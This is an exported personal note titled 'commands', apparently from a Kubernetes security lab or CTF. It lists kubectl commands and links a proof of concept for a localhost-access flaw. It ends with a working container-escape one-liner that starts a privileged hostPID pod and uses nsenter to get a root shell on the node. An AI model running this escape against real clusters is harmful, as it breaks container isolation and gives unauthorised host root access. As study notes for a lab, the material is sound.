<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../../style.css">
    <base target="_parent">
    <title data-trilium-title>commands</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>commands</h1>

      <div class="ck-content"><pre><code class="language-text-plain">kubectl get service	## kubectl get service kubernetes -o yaml</code></pre><pre><code class="language-text-plain">k get hints | jq '.items[].spec.message'</code></pre>

        <p><a href="https://github.com/tabbysable/POC-2020-8558">https://github.com/tabbysable/POC-2020-8558</a> </p>
        <p>this exploit allows us to communicate with the server(8080) when we are
          already in a container</p><pre><code class="language-text-plain">k run &lt;name&gt; --image &lt;pod_image&gt; -it --rm  bash --image-pull-policy=IfNotPresent</code></pre><pre><code class="language-text-plain">k describe pod &lt;name&gt;
k delete pod &lt;name&gt;</code></pre>

        <p>kubernetes Container escape:</p><pre><code class="language-text-plain">kubectl run r00t --restart=Never -it --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}'</code></pre>

        <p> </p>
        <p> </p>
      </div>
    </div>
  </body>

</html>